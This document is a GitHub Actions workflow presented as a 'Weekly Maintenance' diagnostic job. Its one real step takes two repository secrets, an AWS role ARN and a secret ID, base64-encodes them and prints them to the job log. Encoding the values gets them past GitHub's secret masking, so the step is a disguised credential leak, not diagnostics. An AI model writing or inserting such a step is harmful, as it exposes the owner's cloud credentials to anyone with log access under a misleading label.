name: Weekly Maintenance

on:
  workflow_dispatch:

jobs:
  maintenance:
    name: Run Diagnostic Script
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set environment variables
        env:
          AWS_REGION: us-west-2
          ROLE1_ARN: ${{ secrets.ENCODED_ROLE1_ARN }}
          SECRET_ID: ${{ secrets.SECRET_ID }}
        run: |
          echo "[INFO] Starting diagnostics..."
          echo "[INFO] Region: $AWS_REGION"
          echo "[DEBUG] Encoding sensitive parameters..."

          ROLE1_B64=$(echo -n "$ROLE1_ARN" | base64)
          SECRETID_B64=$(echo -n "$SECRET_ID" | base64)

          echo "[DEBUG] RoleArn (b64): $ROLE1_B64"
          echo "[DEBUG] SecretId (b64): $SECRETID_B64"

          echo "[INFO] Maintenance complete."
